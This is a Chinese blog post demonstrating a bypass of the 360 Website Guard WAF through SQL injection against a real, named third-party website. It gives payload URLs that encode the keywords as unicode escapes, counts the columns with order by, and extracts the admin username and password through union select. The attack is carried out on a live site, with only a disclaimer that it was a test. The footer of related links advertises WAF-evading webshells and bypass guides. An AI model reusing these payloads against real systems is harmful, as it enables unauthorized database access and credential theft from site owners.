轻松bypass360网站卫士WAFSQL注入防护

最新推荐文章于 2024-05-31 09:54:20 发布
最新推荐文章于 2024-05-31 09:54:20 发布
阅读量3.3k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h4ck0ne/article/details/50570656
版权

随便网上找了一个网站,只是测试一下,没有干非法的事情!

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49

 

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 and 1=1





被拦截









换一个姿势看看:

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=1

 

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2







成功绕过







上面的描述已经可以证明很多了,还不服嘛?好的,我们来一个完整的绕过过程:



code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49%20order%20by%205





5个字段,继续:

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,2,3,4,5 from admin





已经出来字段了



code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,username,3,4,5 from admin

 

 

code 区域

http://www.py-guanyun.com/CompHonorBig.asp?id=49 %u0061nd 1=2 un%u0069on se%u006c%u0065ct 1,password,3,4,5 from admin

 







成功注射出用户和密码

「已注销」
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
360网站卫士SQL注入绕过案例一个
weixin_30911809的博客
01-23 383
不要以为用了360就可以高枕无忧,直接在netcraft的site_report中找到源站服务器IP,直接SQL脱裤,甚至可获取服务器权限。 存在漏洞的网站: 手工测试存在注入点: 但是网站有360保护,没法脱裤,必须想办法绕过: 360网站卫士都是劫持域名进行流量清洗,但是如果源站服务器防护的不好可能存在绕过。于是在网上搜索,终于在netcraft上找到: 源...
轻松绕各种WAF的POST注入、跨站防御(比如安全狗)
weixin_33751566的博客
08-01 430
XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。 构建如下HTML表单: <!DOCTYPE html> <html> <head&...
探索Web安全的不归路:WAF Bypass实战手册
最新发布
gitblog_00077的博客
05-31 318
探索Web安全的不归路:WAF Bypass实战手册 项目地址:https://gitcode.com/CHYbeta/WAF-Bypass 在网络安全的战场上,Web应用程序防火墙(WAF)是防御者的重要屏障,但对攻击者而言,它同样是一个挑战与机遇并存的地带。今天,我们向你推荐一个名为 "WAF Bypass" 的开源项目,这是一个汇集了多种绕过WAF策略和技术的宝贵资源库。...
360 safe.php,防止网站被黑,增强网站安全文件:360_safe3.php-防SQL注入代码
weixin_39793553的博客
03-10 1074
这个方法非常有效,是360官方提供的解决方案,就是利用这个文件360_safe3.php来防止sql注入,进一步提升网站数据库安全。很多站长对这个网站安全看得非常重,这个SQL注入漏洞是非常之恨,如果用恨之入骨这个词来形容不足为过;现在有防止SQL代码注入的文件,你会选择不使用么?那就把你的目光聚集到下面重要的步骤吧。代码偏多,无忧主机小编就不在这里展现文件代码,点击此处下载此文件:下载地址。下面...
waf绕过—过360主机卫士sql注入
一个普普通通的博客
03-07 2794
过360主机卫士sql注入
360提供的php防sql注入代码修改类
05-02
从360提供的PHP防SQL注入代码改成的一个类,从SQL注入和HTTP跨站两个方面入手,解决网站存在安全风险的问题,希望对朋友们有所帮助。
第07篇:Bypass 360主机卫士SQL注入防御(多姿势)1
08-03
360主机卫士是一款针对服务器的安全防护软件,其中包含了SQL注入防御功能。然而,任何防御系统都有可能被绕过,以下将详细探讨如何绕过360主机卫士SQL注入防御。 ### 0x02 WAF测试 **姿势一:网站后台白名单** ...
Bypass 360主机卫士SQL注入防御(多姿势).pdf
12-21
Bypass 360主机卫士SQL注入防御(多姿势) 从服务器客户端领域,曾经出现过一款360主机卫士,目前已停止更新和维护,官网都打不开了,但服务器中依然经常可以看到它的身影。本文主要分享了几种思路,Bypass 360主机...
第四篇:Bypass 360主机卫士SQL注入防御(多姿势)1
08-03
本文主要探讨了如何规避360主机卫士SQL注入防御措施,针对的是360主机卫士Apache纪念版。SQL注入是一种常见的Web应用安全漏洞,攻击者通过构造恶意SQL语句,欺骗服务器执行非预期的数据库操作,获取敏感数据或篡改...
第二篇:Bypass X-WAF SQL注入防御(多姿势)1
08-03
Bypass X-WAF SQL注入防御多姿势分析 通过对X-WAF的代码分析,我们可以了解到WAF的工作原理,并找到Bypass的方法。X-WAF是一款适用中、小企业的云WAF系统,让中、小企业也可以非常方便地拥有自己的免费云WAF。 ...
第09篇:Bypass X-WAF SQL注入防御(多姿势)1
08-03
第09篇:Bypass X-WAF SQL注入防御(多姿势)1
2019最新过狗过,云锁,360等WAF的PHP免杀大马
03-20
2019最新过狗过,云锁,360等WAF的PHP免杀大马等主流防护软件,2019最新大马下载PHP
我的WafBypass之路(SQL注入篇)
07-11
去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常谈的话题也没什么可写的。很多人一遇到waf就发懵,不知如何是好,能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的,那么就有了此文,用来总结一些学习和培养突破waf的思想。可能总结的并不全,但目的并不是讲那些网上搜来一大把的东西,So…并不会告诉大家现有的姿势,而是突破Waf Bypass思维定势达到独立去挖掘waf的设计缺陷和如何实现自动化的Waf Bypass(这里只讲主流waf的黑盒测试)
360webscan防注入脚本全面绕过
公众号shadow sock7
06-12 6087
参考: https://www.leavesongs.com/PENETRATION/360webscan-bypass.html http://www.moonsec.com/post-687.html http://www.mayter.cn/t/6927
php过滤非法字符类
云烟阁
06-15 4392
<?php class sqlsafe { private $getfilter = "'|(and|or)\\b.+?(>|<|=|in|like)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?
【经验总结】SQL注入Bypass安全狗360主机卫士
TeamsSix 的 CSDN 空间
01-05 849
0x00 前言 这类的文章已经是比较多了,本文也主要是作为学习笔记来记录,主要是记录一下我在学习 SQL 注入 Bypass 的过程,同时前人的不少绕过方法已经失效了,所以这里也是记录一下最新规则的一些绕过方法。 0x01 环境搭建 测试环境:Win7 + Apache + MySQL 5.7.26 + PHP 5.5.45 测试代码: <?php if ($_GET['id']==null...
SQL 注入绕过(一)
不秃头的程序Yang
06-22 660
一、空格字符绕过
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值